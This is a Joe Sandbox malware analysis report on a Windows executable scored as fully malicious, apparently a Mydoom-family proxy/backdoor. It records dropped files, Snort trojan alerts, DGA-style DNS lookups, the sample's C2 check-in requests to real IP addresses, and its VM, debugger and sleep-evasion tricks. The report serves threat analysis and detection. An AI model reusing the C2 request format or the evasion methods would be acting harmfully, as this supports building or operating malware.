Edit tour

Windows Analysis Report
EAfIchN1gN.com_343aab3b8c412c765f9fc753e1f18520

Overview

General Information

Sample Name:	EAfIchN1gN.com_343aab3b8c412c765f9fc753e1f18520 (renamed file extension from com_343aab3b8c412c765f9fc753e1f18520 to exe)
Analysis ID:	666951
MD5:	343aab3b8c412c765f9fc753e1f18520
SHA1:	1173a61d54bb5bc66e403cbe4a8f02662c4dd359
SHA256:	edb7aeaa857881d943f0cd8da0556a6ec7ea8887327679678e0e02ad57423743
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found evasive API chain (may stop execution after checking mutex)

Contain functionality to detect virtual machines

Found API chain indicative of debugger detection

Machine Learning detection for sample

Machine Learning detection for dropped file

Tries to resolve many domain names, but no domain seems valid

Drops executables to the windows directory (C:\Windows) and starts them

Contains functionality to detect sleep reduction / modifications

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

PE file contains strange resources

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Found evasive API chain (may stop execution after accessing registry keys)

Uses Microsoft's Enhanced Cryptographic Provider

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

EAfIchN1gN.exe (PID: 3996 cmdline: "C:\Users\user\Desktop\EAfIchN1gN.exe" MD5: 343AAB3B8C412C765F9FC753E1F18520)

ctfmen.exe (PID: 2740 cmdline: ctfmen.exe MD5: B76123561821C1EF6C90EB2F63793911)

smnss.exe (PID: 1460 cmdline: C:\Windows\system32\smnss.exe MD5: BEB57891AD9E1F6933F96B67C620CE21)

smnss.exe (PID: 2324 cmdline: C:\Windows\system32\smnss.exe MD5: BEB57891AD9E1F6933F96B67C620CE21)

smnss.exe (PID: 5388 cmdline: C:\Windows\system32\smnss.exe MD5: BEB57891AD9E1F6933F96B67C620CE21)

smnss.exe (PID: 5572 cmdline: C:\Windows\system32\smnss.exe MD5: BEB57891AD9E1F6933F96B67C620CE21)

smnss.exe (PID: 5612 cmdline: C:\Windows\system32\smnss.exe MD5: BEB57891AD9E1F6933F96B67C620CE21)

WerFault.exe (PID: 1780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1416 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

smnss.exe (PID: 1992 cmdline: C:\Windows\system32\smnss.exe MD5: BEB57891AD9E1F6933F96B67C620CE21)

MpCmdRun.exe (PID: 6584 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Snort Signatures

ETPRO TROJAN User-Agent (explwer) - Source IP: 192.168.2.4 - Destination IP: 64.70.19.203

Timestamp:	192.168.2.464.70.19.20349776802807187 07/17/22-08:24:17.965396
SID:	2807187
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN User-Agent (explwer) - Source IP: 192.168.2.4 - Destination IP: 206.191.152.37

Timestamp:	192.168.2.4206.191.152.3749758802807187 07/17/22-08:24:14.946410
SID:	2807187
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Worm.Mydoom Checkin - Source IP: 192.168.2.4 - Destination IP: 64.70.19.203

Timestamp:	192.168.2.464.70.19.20349776802807186 07/17/22-08:24:17.965396
SID:	2807186
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Worm.Mydoom Checkin - Source IP: 192.168.2.4 - Destination IP: 206.191.152.37

Timestamp:	192.168.2.4206.191.152.3749758802807186 07/17/22-08:24:14.946410
SID:	2807186
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 206.191.152.37 - Destination IP: 192.168.2.4

Timestamp:	206.191.152.37192.168.2.480497582037771 07/17/22-08:24:15.189819
SID:	2037771
Source Port:	80
Destination Port:	49758
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: EAfIchN1gN.exe	Metadefender: Detection: 74%			Perma Link
Source: EAfIchN1gN.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Source: EAfIchN1gN.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\ctfmen.exe	Avira: detection malicious, Label: TR/Crypt.ULPM.Gen
Source: C:\Windows\SysWOW64\grcopy.dll	Avira: detection malicious, Label: TR/Proxy.Gen
Source: C:\Windows\SysWOW64\smnss.exe	Avira: detection malicious, Label: TR/Proxy.Gen
Source: C:\Windows\SysWOW64\shervans.dll	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Windows\SysWOW64\satornas.dll	Avira: detection malicious, Label: HTML/ExpKit.Gen2

Machine Learning detection for sample

Source: EAfIchN1gN.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\ctfmen.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\grcopy.dll	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\zipfiaq.dll	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\smnss.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\zipfi.dll	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\shervans.dll	Joe Sandbox ML: detected

Source: 7.0.smnss.exe.400000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 8.0.smnss.exe.400000.3.unpack	Avira: Label: TR/Proxy.Gen
Source: 10.0.smnss.exe.400000.2.unpack	Avira: Label: TR/Proxy.Gen
Source: 10.0.smnss.exe.400000.3.unpack	Avira: Label: TR/Proxy.Gen
Source: 8.0.smnss.exe.400000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 13.0.smnss.exe.400000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 8.0.smnss.exe.400000.2.unpack	Avira: Label: TR/Proxy.Gen
Source: 8.0.smnss.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen
Source: 13.2.smnss.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.3.unpack	Avira: Label: TR/Proxy.Gen
Source: 4.0.ctfmen.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 6.0.smnss.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen
Source: 13.0.smnss.exe.400000.2.unpack	Avira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.2.unpack	Avira: Label: TR/Proxy.Gen
Source: 7.0.smnss.exe.400000.2.unpack	Avira: Label: TR/Proxy.Gen
Source: 7.0.smnss.exe.400000.3.unpack	Avira: Label: TR/Proxy.Gen
Source: 6.0.smnss.exe.400000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 7.0.smnss.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen
Source: 0.0.EAfIchN1gN.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen
Source: 10.0.smnss.exe.400000.1.unpack	Avira: Label: TR/Proxy.Gen
Source: 10.0.smnss.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen
Source: 13.0.smnss.exe.400000.0.unpack	Avira: Label: TR/Proxy.Gen

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_0040447C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,sprintf,		0_2_0040447C
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_0040447C CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,sprintf,		5_2_0040447C

Source: EAfIchN1gN.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,_mbscat,FindClose,		0_2_00403790
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,_mbscat,FindClose,		5_2_00403790

Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.4:49758 -> 206.191.152.37:80
Source: Traffic	Snort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.4:49758 -> 206.191.152.37:80
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 206.191.152.37:80 -> 192.168.2.4:49758
Source: Traffic	Snort IDS: 2807187 ETPRO TROJAN User-Agent (explwer) 192.168.2.4:49776 -> 64.70.19.203:80
Source: Traffic	Snort IDS: 2807186 ETPRO TROJAN Worm.Mydoom Checkin 192.168.2.4:49776 -> 64.70.19.203:80

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: aeaqnmehen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wmsqhqawsh.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: peeahprsqs.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sqeppehhwa.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rqwapnshss.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: sersepwrnr.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pnhrphrsws.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: weswpsqess.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qwphqwsspa.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mprnamhpnn.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: wnnrshhwns.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mesnqrmmwn.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: npehhsmnsa.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: reepsrepnh.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: apaqseasqs.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hwsamwmwph.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: naearnqmas.us replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qaepmnrnma.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mnerhqmqes.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qhmawaqhrs.info replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pawsnqwmph.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mwphqrqpsa.in replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hraqsaqsqh.net replaycode: Name error (3)

Source: Joe Sandbox View	ASN Name: CENTURYLINK-LEGACY-SAVVISUS CENTURYLINK-LEGACY-SAVVISUS
Source: Joe Sandbox View	ASN Name: VOXEL-DOT-NETUS VOXEL-DOT-NETUS

Source: Joe Sandbox View

IP Address: 64.70.19.203 64.70.19.203

Source: unknown

DNS traffic detected: queries for: spmhaasaen.biz

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00401C2C memset,memset,_mbscat,_mbscat,_mbscat,_mbscat,_mbscat,_mbscat,Sleep,send,recv,strtok,strtok,closesocket,atoi,atoi,memset,lstrlen,lstrcmp,lstrcmp,

0_2_00401C2C

Source: global traffic	HTTP traffic detected: GET /imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk HTTP/1.1Host: spmhaasaen.bizUser-Agent: explwer
Source: global traffic	HTTP traffic detected: GET /imgs/krewa/nqxa.php?id=5143sudk&s5=3159&lip=192.168.2.4&win=Unk HTTP/1.1Host: ehmpeseeaa.wsUser-Agent: explwer

Source: ctfmen.exe, 00000004.00000002.273494554.00000000009E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: EAfIchN1gN.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Windows\SysWOW64\smnss.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1416

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

File created: C:\Windows\SysWOW64\ctfmen.exe

Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00408054	0_2_00408054
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00408B60	0_2_00408B60
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_1000A000	0_2_1000A000
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00408054	5_2_00408054
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00408B60	5_2_00408B60

Source: C:\Windows\SysWOW64\smnss.exe	Code function: String function: 00404C38 appears 47 times
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: String function: 00404C38 appears 47 times

Source: EAfIchN1gN.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: grcopy.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smnss.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: EAfIchN1gN.exe	Metadefender: Detection: 74%
Source: EAfIchN1gN.exe	ReversingLabs: Detection: 96%

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

File read: C:\Users\user\Desktop\EAfIchN1gN.exe

Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\EAfIchN1gN.exe "C:\Users\user\Desktop\EAfIchN1gN.exe"
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Process created: C:\Windows\SysWOW64\ctfmen.exe ctfmen.exe
Source: C:\Windows\SysWOW64\ctfmen.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1416
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe
Source: C:\Windows\SysWOW64\ctfmen.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Process created: C:\Windows\SysWOW64\ctfmen.exe ctfmen.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ctfmen.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Process created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exe	Jump to behavior

Source: C:\Windows\SysWOW64\smnss.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00404DF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,		0_2_00404DF4
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00404DF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,		5_2_00404DF4

Source: C:\Windows\SysWOW64\smnss.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF26.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@19/14@25/3

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00404D3A CreateToolhelp32Snapshot,Process32First,strcmp,OpenProcess,TerminateProcess,Process32Next,

0_2_00404D3A

Source: C:\Windows\SysWOW64\smnss.exe	Mutant created: \Sessions\1\BaseNamedObjects\x_socks5aan
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1460
Source: C:\Windows\SysWOW64\smnss.exe	Mutant created: \Sessions\1\BaseNamedObjects\VULnaShvolna
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3144:120:WilError_01

Source: C:\Windows\SysWOW64\smnss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Windows\SysWOW64\ctfmen.exe

Unpacked PE file: 4.2.ctfmen.exe.400000.0.unpack 4v0yeveo:EW;4847xtmv:W;488vjzju:W; vs 4v0yeveo:ER;4847xtmv:R;488vjzju:W;

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_0041E837 push ds; ret	0_2_0041E83B
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_1000AAD4 push edi; iretd	0_2_1000AAD7
Source: C:\Windows\SysWOW64\ctfmen.exe	Code function: 4_2_0040734E push dword ptr [ecx+ebp-5Dh]; ret	4_2_00407355
Source: C:\Windows\SysWOW64\ctfmen.exe	Code function: 4_2_00408202 push edx; ret	4_2_0040820D
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_0041E837 push ds; ret	5_2_0041E83B
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 13_2_0041E837 push ds; ret	13_2_0041E83B

Source: EAfIchN1gN.exe	Static PE information: section name: 68d6cyfj
Source: EAfIchN1gN.exe	Static PE information: section name: y899crkm
Source: EAfIchN1gN.exe	Static PE information: section name: 718zwvss
Source: ctfmen.exe.0.dr	Static PE information: section name: 4v0yeveo
Source: ctfmen.exe.0.dr	Static PE information: section name: 4847xtmv
Source: ctfmen.exe.0.dr	Static PE information: section name: 488vjzju
Source: shervans.dll.0.dr	Static PE information: section name: 5381fpcp
Source: shervans.dll.0.dr	Static PE information: section name: 5c33yiab
Source: shervans.dll.0.dr	Static PE information: section name: 5676uoia
Source: grcopy.dll.0.dr	Static PE information: section name: 5682hkuj
Source: grcopy.dll.0.dr	Static PE information: section name: 5460fgai
Source: grcopy.dll.0.dr	Static PE information: section name: 5500hosh
Source: smnss.exe.0.dr	Static PE information: section name: 5682hkuj
Source: smnss.exe.0.dr	Static PE information: section name: 5460fgai
Source: smnss.exe.0.dr	Static PE information: section name: 5500hosh

Source: C:\Users\user\Desktop\EAfIchN1gN.exe

Code function: 0_2_00406E1C LoadLibraryA,GetProcAddress,FreeLibrary,DeleteFileA,Sleep,

0_2_00406E1C

Source: initial sample

Static PE information: section where entry point is pointing to: y899crkm

Source: initial sample

Static PE information: section name: 5c33yiab entropy: 7.547400585476299

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Executable created and started: C:\Windows\SysWOW64\ctfmen.exe			Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe	Executable created and started: C:\Windows\SysWOW64\smnss.exe			Jump to behavior

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\shervans.dll	Jump to dropped file
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\ctfmen.exe	Jump to dropped file
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\smnss.exe	Jump to dropped file
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\grcopy.dll	Jump to dropped file

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\shervans.dll	Jump to dropped file
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\ctfmen.exe	Jump to dropped file
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\smnss.exe	Jump to dropped file
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	File created: C:\Windows\SysWOW64\grcopy.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\smnss.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_5-3902
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_0-4589

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: vmware qemu qemu vbox		0_2_00404990
Source: C:\Windows\SysWOW64\smnss.exe	Code function: vmware qemu qemu vbox		5_2_00404990

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_00406BEA		0_2_00406BEA
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_00406BEA		5_2_00406BEA

Source: C:\Windows\SysWOW64\smnss.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_5-4153

Source: C:\Users\user\Desktop\EAfIchN1gN.exe TID: 2208	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\EAfIchN1gN.exe TID: 6004	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\EAfIchN1gN.exe TID: 6004	Thread sleep time: -462000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exe TID: 5228	Thread sleep time: -1440000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\smnss.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_5-3972

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_0040814C GetSystemTime followed by cmp: cmp ax, 0010h and CTI: jbe 00408174h	0_2_0040814C
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_0040814C GetSystemTime followed by cmp: cmp ax, 000bh and CTI: jbe 00408185h	0_2_0040814C
Source: C:\Users\user\Desktop\EAfIchN1gN.exe	Code function: 0_2_0040814C GetSystemTime followed by cmp: cmp ax, 001eh and CTI: jbe 00408196h	0_2_0040814C
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_0040814C GetSystemTime followed by cmp: cmp ax, 0010h and CTI: jbe 00408174h	5_2_0040814C
Source: C:\Windows\SysWOW64\smnss.exe	Code function: 5_2_0040814C GetSystemTime followed by cmp: cmp ax, 000bh and CTI: jbe 00408185h	5_2_0040814C
